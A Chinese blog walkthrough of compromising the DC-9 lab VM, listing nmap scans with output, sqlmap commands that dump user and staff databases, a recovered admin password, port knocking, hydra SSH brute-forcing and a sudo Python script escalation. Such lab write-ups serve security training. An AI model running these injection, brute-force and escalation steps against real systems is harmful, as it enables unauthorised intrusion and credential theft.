入侵靶机DC-9

最新推荐文章于 2022-11-14 11:46:57 发布

火中的冰~

最新推荐文章于 2022-11-14 11:46:57 发布

阅读量509

点赞数

分类专栏： DC-1-9通关秘籍渗透测试

本文链接：https://blog.csdn.net/qq_42094992/article/details/109616114

版权

渗透测试同时被 2 个专栏收录

52 篇文章 8 订阅

订阅专栏

DC-1-9通关秘籍

10 篇文章 0 订阅

订阅专栏

1.主机发现

Nmap -sP 192.168.43.0/24

C:\Users\ASUS>Nmap -sP 192.168.43.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2020-11-11 11:53 ?D1ú±ê×?ê±??
Nmap scan report for 192.168.43.79
Host is up (0.0010s latency).
MAC Address: 00:0C:29:B7:B6:AD (VMware)
Nmap scan report for 192.168.43.131
Host is up (0.0060s latency).
MAC Address: 46:EC:05:32:DF:DA (Unknown)
Nmap scan report for 192.168.43.193
Host is up (0.0020s latency).
MAC Address: 00:0C:29:D4:89:D8 (VMware)
Nmap scan report for 192.168.43.244
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 39.40 seconds

2.信息收集

端口扫描

C:\Users\ASUS>Nmap -A 192.168.43.79 -p- -oN nmap.A
Starting Nmap 7.70 ( https://nmap.org ) at 2020-11-11 11:55 ?D1ú±ê×?ê±??
Stats: 0:00:02 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Stats: 0:00:05 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
ARP Ping Scan Timing: About 100.00% done; ETC: 11:55 (0:00:00 remaining)
Nmap scan report for 192.168.43.79
Host is up (0.00043s latency).
Not shown: 65533 closed ports
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:B7:B6:AD (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.43 ms 192.168.43.79

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.63 seconds

C:\User

访问web界面

3.漏洞利用

尝试SQL注入

web界面存在4个按钮，看见有一个表单，使用sqlmap尝试注入。

qlmap -u "http://192.168.43.79/results.php" --data "search=1" --dbs

表名

sqlmap -u "http://192.168.43.79/results.php" --data "search=1" -D users --tables

跑表中字段

sqlmap -u "http://192.168.43.79/results.php" --data "search=1" -D users -T UserDetails --dump

字段内容

users表中的内容为一些用户的账号密码

之后看一下Staff库中的内容

sqlmap -u "http://192.168.43.79/results.php" --data "search=1" -D Staff --tables

sqlmap -u "http://192.168.43.79/results.php" --data "search=1" -D Staff -T StaffDetails --columns -batch

查看Staff库中 User表中字段内容

sqlmap -u "http://192.168.43.79/results.php" --data "search=1" -D Staff -T Users --dump -batch

这里Sqlmap直接给我们爆破出来了密码可以直接用来登录。

使用admin登录

admin:transorbital1

尝试adminSSH登录失败

登录后发现文件包含漏洞

可能使用端口敲门服务knockd，

查看配置文件内容 /etc/knockd.conf

Nmap 尝试访问端口

查看22端口是否开启

尝试SSH登陆系统

这里登陆需要密钥对。

通过User库中的信息生成字典进行爆破

hydra -L usera -P passwda 192.168.43.79 ssh

SSH登陆janitor

ssh janitor@192.168.43.79

登陆之后发现密码文件存入刚刚的爆破密码里继续爆破。

hydra -L usera -P passwda 192.168.43.79 ssh

这次多出了fredf用户，SSH登录看看

4.提权

登录之后sudo -l查看是否存在管理员权限命令

发现python脚本可以sudo执行

kali下生成非对称加密密码

写入创建用户命令，执行脚本。

5.查看flag

火中的冰~

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
入侵靶机DC-9

1.主机发现Nmap -sP 192.168.43.0/24C:\Users\ASUS>Nmap -sP 192.168.43.0/24Starting Nmap 7.70 ( https://nmap.org ) at 2020-11-11 11:53 ?D1ú±ê×?ê±??Nmap scan report for 192.168.43.79Host is up (0.0010s latency).MAC Address: 00:0C:29:B7:B6:AD (VMware).
复制链接

扫一扫

专栏目录